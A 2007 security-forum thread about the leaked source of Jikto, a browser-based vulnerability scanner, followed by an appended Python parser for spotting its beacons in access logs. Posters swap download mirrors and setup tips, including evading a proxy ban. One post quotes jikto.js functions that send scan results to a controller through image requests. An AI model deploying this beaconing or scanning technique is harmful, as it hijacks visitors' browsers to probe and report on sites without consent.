Sla.ckers.org
Current Page: 1 of 2
jikto source code
Posted by: blad3
Date: April 01, 2007 07:04AM

Hi guys,

I was listening to the latest Security Now! (with Steve Gibson; hey, this guy has good intentions :P) and he mentioned the Jikto source code being leaked.
I would like to take a look. Does anybody have a copy?

Re: jikto source code
Date: April 01, 2007 08:27AM

Is this it? http://www.pentest.it/jikto/jikto.js

Re: jikto source code
Date: April 01, 2007 08:28AM

http://www.pentest.it/jikto/ other files

Re: jikto source code
Posted by: Anonymous User
Date: April 01, 2007 02:11PM

damnit - down already. did you backup the files?

Re: jikto source code
Posted by: Henaro
Date: April 01, 2007 02:14PM

I'd like to see the source also. Anyone have it?

Re: jikto source code
Posted by: Anonymous User
Date: April 01, 2007 02:16PM

1st of April??

Re: jikto source code
Date: April 01, 2007 06:36PM

I have a backup; I thought they might take it down, seeing they were asking people to take it off their sites.

Re: jikto source code
Date: April 01, 2007 06:46PM

[URL REMOVED] Please look elsewhere

btw this is not an April Fools joke. Tell me if the server is not responding. It's on my home server so kinda unreliable. Make a backup because I will take the server down after you check.



Edited 1 time(s). Last edit at 04/06/2007 01:04AM by CrYpTiC_MauleR.

Re: jikto source code
Date: April 01, 2007 08:10PM

Fukken Saved! I was wondering when the actual source would be available as it was supposed to be out around the 25th, and I knew they had already presented it to the public.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: jikto source code
Date: April 01, 2007 09:39PM

Anyone else want a copy before I take it down?

Re: jikto source code
Posted by: rsnake
Date: April 01, 2007 11:32PM

Interesting how the jikto control was changed! Already being used by a number of people I see.

- RSnake
Gotta love it. http://ha.ckers.org

Re: jikto source code
Date: April 02, 2007 12:07AM

Taking my server down; anyone who wants a copy, PM me.

UPDATE: please read http://sla.ckers.org/forum/read.php?11,9275,9326#msg-9559



Edited 1 time(s). Last edit at 04/06/2007 01:05AM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: blad3
Date: April 02, 2007 02:33AM

Here are the slides
http://www.spidynamics.com/spilabs/education/presentations/Javascript_malware.pdf

Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 01:43PM

Anyone playing with this tool? I need some guidance :)

Re: jikto source code
Posted by: blad3
Date: April 02, 2007 01:56PM

I did some tests. What problems do you have?

Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 02:04PM

Well, there are four files. I just coded a quick PHP file to replace control.txt and changed the var GUIURL.

I'm trying without using a "proxy"; I'm scanning a site in the same domain (to bypass the Same Origin Policy)... but I get these weird JavaScript errors.

Is there any chance that I can see a working demo, blad3? Just to see how you are testing.

Re: jikto source code
Posted by: blad3
Date: April 02, 2007 02:14PM

wtf?
http://blogs.zdnet.com/security/?p=146

Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 02:37PM

Ryan Naraine Wrote:
-------------------------------------------------------
> The code has since been posted to the Sla.ckers.org forum.
> Hacker RSnake discusses snippets of the code, which can be
> used to hunt for common security holes and then connect
> back to its controller for instructions on which Web sites
> to hit and which flaws to look for.

Hahahaha...



Edited 1 time(s). Last edit at 04/02/2007 02:38PM by busin3ss.

Re: jikto source code
Posted by: blad3
Date: April 02, 2007 02:51PM

busin3ss, I'm testing on localhost like you did.
You are most definitely doing something wrong; maybe you didn't use rot13, or entered some bad URL or path, or ?
The script is working pretty nice, I'm watching the requests/responses with Firebug.
You can even insert breakpoints and debug the code if you want. Firebug rocks!

Re: jikto source code
Posted by: busin3ss
Date: April 02, 2007 03:02PM

Downloading Firebug right now...

For those who want to download the source code (Since all mirrors are offline):

http://busin3ss.name/jikto-in-the-wild



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by busin3ss.

Re: jikto source code
Date: April 02, 2007 03:03PM

>> wtf?
>> [blogs.zdnet.com]

oops



Edited 1 time(s). Last edit at 04/02/2007 03:03PM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: Acidus
Date: April 02, 2007 03:38PM

You can run it against localhost sites to test. You'll need to edit the sendRequest() function. The global variable "prefix" holds the URL prefixing for the proxying site. The code in the isLinkgood() function should prevent Jikto from getting out of control and scanning pages that aren't on localhost

Re: jikto source code
Posted by: Delixe
Date: April 02, 2007 04:52PM

Doesn't really do anything. I changed the URL and nothing really occurs. Loads the site in an iframe and... nothing.

Re: jikto source code
Posted by: Beetlejuice
Date: April 03, 2007 01:56PM

I missed the download window. Does anyone have the whole lot available for me, pls?

Re: jikto source code
Posted by: Anonymous User
Date: April 03, 2007 04:15PM

For those with reading disabilities:
http://busin3ss.name/wp-content/uploads/2007/04/jitko.zip

Greetings,
.mario



Edited 1 time(s). Last edit at 04/03/2007 04:16PM by .mario.

Re: jikto source code
Date: April 05, 2007 11:50PM

Note to everyone who comes to this post PMing me: I am not responding to PMs for Jikto source anymore. If you can't be smart and use Google to find mirrors, or even bother to read the posts on this page, which clearly provide a working link to a copy of Jikto, then I will ignore you. Come on people, do we need our hands held for everything?



Edited 1 time(s). Last edit at 04/06/2007 01:06AM by CrYpTiC_MauleR.

Re: jikto source code
Posted by: thrill
Date: April 06, 2007 12:36AM

@CM

Edit the post? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: jikto source code
Posted by: busin3ss
Date: April 06, 2007 01:01PM

Mirror of Jikto -> http://busin3ss.name/jikto-in-the-wild

Re: jikto source code
Date: April 06, 2007 01:37PM

Heh, hopefully they know how to click a link. I mean, the amount of people who PMed me even after you posted the link was ridiculous. Either they can't read or don't know how to use Google. I was asking myself this: if they can't even Google or read this page, then how will they know how to use Jikto? I say someone make a post with links to known mirrors a sticky.

Re: jikto source code
Posted by: Royal2000H
Date: April 08, 2007 06:36AM

I got jikto and everything

I edited the jikto.js to direct to my control.txt

the-cloak banned me within seconds, so I'm using Google Translate even though I'm testing pages in the same domain.

With Firebug I can see, for example:
http://www.testdomainiamusing.com/jikto/control.txt1&url=http%3A//www.testdomainiamusing.com%3A80/gallery/details.php%3Fimage_id%3D30&method=GET

looking at the code in jikto.js:

function reportURL(method, url) {
    var i = new Image();
    i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);
}

function reportVuln(method, url, sev, title, req, resp) {
    var i = new Image();
    i.src = GUIURL + "2&url="

which means that unless I see "http://www.testdomainiamusing.com/jikto/control.txt2&url="
it did not find a vulnerability

I guess that's the way to do it without a controller, but someone above me said they wrote up a controller; can you post the source to the controller?

Or maybe I'm using the tool incorrectly?

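Reading the beacon format in that post from the other side: a proxy or web-server log that records these image requests lets an investigator reconstruct which URLs a hijacked browser reported (type 1) and which it flagged (type 2), and which client was doing the reporting. The parser below is an added example written for this thread; it is not Jikto code and not code from any poster. It assumes only the report format quoted above (the report type digit concatenated directly onto the controller URL, then `&url=` and `&method=` with JavaScript `escape()` encoding); the log lines, hostnames and addresses are constructed for the example.

```python
"""Forensic parser for Jikto-style image-beacon reports in access logs.

Added example, not code from the thread or from Jikto. Assumes the report
format quoted in the post above: GUIURL + "1&url=" + escape(url) +
"&method=" + escape(method) for a visited URL, and GUIURL + "2&url=..."
for a reported finding. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). Hosts, paths and
# addresses are hypothetical; lines 1 and 3 mimic the beacon URL quoted above.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Apr/2007:06:30:01 +0000] "GET /jikto/control.txt1&url=http%3A//www.testdomainiamusing.com%3A80/gallery/details.php%3Fimage_id%3D30&method=GET HTTP/1.1" 200 43
10.0.0.5 - - [08/Apr/2007:06:30:02 +0000] "GET /gallery/details.php?image_id=30 HTTP/1.1" 200 4096
10.0.0.5 - - [08/Apr/2007:06:30:05 +0000] "GET /jikto/control.txt2&url=http%3A//www.testdomainiamusing.com%3A80/gallery/details.php%3Fimage_id%3D30&method=GET HTTP/1.1" 200 43
10.0.0.7 - - [08/Apr/2007:06:31:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Common Log Format: client, ident, user, [timestamp], "VERB path PROTO", status.
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# GUIURL and the type digit are concatenated with no "?" separator, so the
# whole report lands in the request path; the digit sits right before "&url=".
# escape() encodes "&" as %26, so the url field cannot contain a raw "&".
BEACON_RE = re.compile(
    r'(?P<kind>[12])&url=(?P<url>[^&\s"]+)&method=(?P<method>[^&\s"]+)'
)
KINDS = {"1": "visit", "2": "finding"}


def js_unescape(s):
    """Reverse JavaScript escape(): %uXXXX for code points above 0xFF,
    then %XX, which escape() emits as the Latin-1 code point."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def parse_beacon(path):
    """Return a report dict for a beacon request path, or None if it is not one."""
    m = BEACON_RE.search(path)
    if not m:
        return None
    return {
        "kind": KINDS[m.group("kind")],
        "target": js_unescape(m.group("url")),
        "method": js_unescape(m.group("method")),
        # Everything before the type digit is the controller (GUIURL) path.
        "controller": path[: m.start("kind")],
    }


def scan_log(text):
    """Extract all beacon reports from CLF log text, tagged with client and time."""
    events = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than fail the whole scan
        beacon = parse_beacon(m.group("path"))
        if beacon is None:
            continue
        beacon.update(client=m.group("client"), ts=m.group("ts"))
        events.append(beacon)
    return events


def summarize(events):
    """Per reporting client: how many URLs it visited and how many it flagged."""
    by_client = {}
    for e in events:
        counts = by_client.setdefault(e["client"], {"visit": 0, "finding": 0})
        counts[e["kind"]] += 1
    return by_client


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for e in found:
        print(f'{e["ts"]} {e["client"]} {e["kind"]:8} {e["method"]} '
              f'{e["target"]} (controller path {e["controller"]})')
    print(summarize(found))
```

Two details worth noting for anyone matching this in real logs: because the tool builds the report by string concatenation there is no `?` in the request, so a query-string parser will not see the fields and a substring match on the path is needed; and `escape()` is not `encodeURIComponent()`, so non-ASCII characters in a reported URL arrive as `%uXXXX`, which `urllib.parse.unquote` alone does not decode.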